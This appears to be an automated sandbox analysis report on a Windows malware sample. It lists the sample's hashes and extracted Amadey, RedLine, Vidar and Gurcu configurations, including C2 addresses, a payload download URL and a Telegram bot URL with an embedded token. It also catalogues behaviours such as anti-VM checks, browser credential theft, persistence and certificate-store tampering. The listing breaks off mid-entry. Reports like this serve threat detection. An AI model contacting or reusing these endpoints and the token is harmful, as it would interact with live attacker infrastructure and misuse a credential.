Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
04/03/2025, 09:15
Static task
static1
Behavioral task
behavioral1
Sample
fbd20cabacee9b0def4ea7c0c7340405.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
fbd20cabacee9b0def4ea7c0c7340405.exe
Resource
win10v2004-20250217-en
General
-
Target
fbd20cabacee9b0def4ea7c0c7340405.exe
-
Size
1.8MB
-
MD5
fbd20cabacee9b0def4ea7c0c7340405
-
SHA1
f43864031c537e45ed653c82dd3e8aef4fcf32a9
-
SHA256
fbeacc19842742c19181eb930a0cd2baca9f900e388204a30e941090809f7fd7
-
SHA512
ceb4cb9fa7cf211f495e477ecb896852bba32bb230f825cfb0188733b80b12482d5ead72eea25ace0e032481547a6d8461c149539effde77c2cc8fa859629495
-
SSDEEP
49152:rMncqPrIpxu4Z0biPikcjaUpVd10oLYsdDXKZbcWvAbh3cgm3vTh:p71ZCUcjJXd1JdobhVTF
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
redline
testproliv
45.155.103.183:1488
Extracted
vidar
ir7am
https://t.me/l793oy
https://steamcommunity.com/profiles/76561199829660832
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
Extracted
gurcu
https://api.telegram.org/bot8193153557:AAHX0oj36X6CO229w0kT6TCXI6SILg88UAs/getFile?file_id=BQACAgQAAxkDAAMjZ8QuV4rtGUD2QR_Kn2ogaU59Xo0AAjeQAAJbUilSuphO0630PP82B
Signatures
-
Amadey family
-
Detect Vidar Stealer 12 IoCs
resource yara_rule behavioral2/memory/808-386-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/808-446-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/808-455-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/808-460-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/808-461-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/808-464-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/808-469-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/808-471-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/808-475-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/808-476-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/808-480-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 behavioral2/memory/808-945-0x0000000000400000-0x0000000000429000-memory.dmp family_vidar_v7 -
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/3276-182-0x0000000000400000-0x0000000000436000-memory.dmp family_xworm -
Gurcu family
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral2/memory/2096-310-0x0000028A6B2B0000-0x0000028A6B302000-memory.dmp family_redline -
Redline family
-
Vidar family
-
Xworm family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempZUGIAMURMLQMTMHM60BVVYPQWNN9V2TX.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 8a847ea571.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ v6Oqdnc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 886c72dbb9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ fbd20cabacee9b0def4ea7c0c7340405.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ JqGBbm7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 108 1028 powershell.exe 131 2476 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
pid Process 1028 powershell.exe 2476 powershell.exe 3496 powershell.exe 2572 powershell.exe 2968 powershell.exe 5472 powershell.exe 5212 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 15 IoCs
flow pid Process 55 2240 bPDDW9F.exe 108 1028 powershell.exe 131 2476 powershell.exe 25 3240 rapes.exe 35 3240 rapes.exe 35 3240 rapes.exe 35 3240 rapes.exe 35 3240 rapes.exe 35 3240 rapes.exe 35 3240 rapes.exe 35 3240 rapes.exe 35 3240 rapes.exe 35 3240 rapes.exe 35 3240 rapes.exe 183 3240 rapes.exe -
Stops running service(s) 4 TTPs
-
Uses browser remote debugging 2 TTPs 10 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 6136 msedge.exe 2028 chrome.exe 5368 chrome.exe 4536 msedge.exe 5356 msedge.exe 5148 chrome.exe 5160 chrome.exe 6012 chrome.exe 1356 msedge.exe 2520 msedge.exe -
Checks BIOS information in registry 2 TTPs 20 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 8a847ea571.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 886c72dbb9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion JqGBbm7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempZUGIAMURMLQMTMHM60BVVYPQWNN9V2TX.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion fbd20cabacee9b0def4ea7c0c7340405.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion JqGBbm7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempZUGIAMURMLQMTMHM60BVVYPQWNN9V2TX.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 8a847ea571.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 886c72dbb9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion fbd20cabacee9b0def4ea7c0c7340405.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation fbd20cabacee9b0def4ea7c0c7340405.exe Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation d0HNrLB.exe Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Control Panel\International\Geo\Nation mshta.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d0HNrLB.exe d0HNrLB.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d0HNrLB.exe d0HNrLB.exe -
Executes dropped EXE 30 IoCs
pid Process 3240 rapes.exe 2832 JqGBbm7.exe 2080 3Mv6i65.exe 4700 3Mv6i65.exe 3644 rapes.exe 1588 khykuQw.exe 3784 zY9sqWs.exe 2240 bPDDW9F.exe 1436 d0HNrLB.exe 3276 d0HNrLB.exe 2764 JCFx2xj.exe 3004 rapes.exe 2224 7UlMpzX.exe 3256 Q8yTiDPzQaAiAnr5kv.exe 1116 VirtDXPlBjAIqu.iso 2176 d0HNrLB.exe 1752 d0HNrLB.exe 2096 BXxKvLN.exe 1576 ShellKernelBridge.exe 2472 v6Oqdnc.exe 1188 VirtualBoxNetworkBridge.exe 3148 45d3c59eed.exe 3948 winDriverChipsetService.exe 748 YoQVP7DxS.bin 2532 OEHBOHk.exe 5056 TempZUGIAMURMLQMTMHM60BVVYPQWNN9V2TX.EXE 5440 8a847ea571.exe 5868 483d2fa8a0d53818306efeb32d3.exe 5724 ckonftponqgz.exe 4592 886c72dbb9.exe -
Identifies Wine through registry keys 2 TTPs 10 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine v6Oqdnc.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine 8a847ea571.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine JqGBbm7.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine TempZUGIAMURMLQMTMHM60BVVYPQWNN9V2TX.EXE Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine 886c72dbb9.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine fbd20cabacee9b0def4ea7c0c7340405.exe Key opened \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\Software\Wine rapes.exe -
Loads dropped DLL 16 IoCs
pid Process 4700 3Mv6i65.exe 4700 3Mv6i65.exe 4700 3Mv6i65.exe 4700 3Mv6i65.exe 4700 3Mv6i65.exe 4700 3Mv6i65.exe 4700 3Mv6i65.exe 4700 3Mv6i65.exe 4700 3Mv6i65.exe 4700 3Mv6i65.exe 1116 VirtDXPlBjAIqu.iso 1116 VirtDXPlBjAIqu.iso 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe 3948 winDriverChipsetService.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 3 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\d0HNrLB = "C:\\Users\\Admin\\AppData\\Roaming\\d0HNrLB.exe" d0HNrLB.exe Set value (str) \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\45d3c59eed.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10086770101\\45d3c59eed.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-100612193-3312047696-905266872-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10086780121\\am_no.cmd" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
pid Process 5428 powercfg.exe 1188 powercfg.exe 5152 powercfg.exe 5028 powercfg.exe 5236 powercfg.exe 4180 powercfg.exe 4812 powercfg.exe 5400 powercfg.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x0007000000023d76-319.dat autoit_exe -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\system32\MRT.exe OEHBOHk.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\system32\MRT.exe ckonftponqgz.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
pid Process 4816 fbd20cabacee9b0def4ea7c0c7340405.exe 3240 rapes.exe 2832 JqGBbm7.exe 3644 rapes.exe 3004 rapes.exe 2472 v6Oqdnc.exe 5056 TempZUGIAMURMLQMTMHM60BVVYPQWNN9V2TX.EXE 5440 8a847ea571.exe 5868 483d2fa8a0d53818306efeb32d3.exe 4592 886c72dbb9.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 1436 set thread context of 3276 1436 d0HNrLB.exe 107 PID 2176 set thread context of 1752 2176 d0HNrLB.exe 120 PID 2764 set thread context of 808 2764 JCFx2xj.exe 143 PID 5724 set thread context of 4780 5724 ckonftponqgz.exe 227 PID 5724 set thread context of 1052 5724 ckonftponqgz.exe 233 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job fbd20cabacee9b0def4ea7c0c7340405.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5420 sc.exe 1444 sc.exe 4548 sc.exe 5680 sc.exe -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral2/files/0x000a000000023c5a-50.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
pid pid_target Process procid_target 2300 1436 WerFault.exe 106 2316 2176 WerFault.exe 119 -
System Location Discovery: System Language Discovery 1 TTPs 33 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 45d3c59eed.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BitLockerToGo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 886c72dbb9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d0HNrLB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempZUGIAMURMLQMTMHM60BVVYPQWNN9V2TX.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8a847ea571.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language khykuQw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language v6Oqdnc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fbd20cabacee9b0def4ea7c0c7340405.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d0HNrLB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JqGBbm7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zY9sqWs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d0HNrLB.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JCFx2xj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d0HNrLB.exe -
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 BitLockerToGo.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString BitLockerToGo.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2428 timeout.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe -
Modifies data under HKEY_USERS 48 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133855534564956108" chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Modifies system certificate store 2 TTPs 6 IoCs
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a ShellKernelBridge.exe Set value (data) 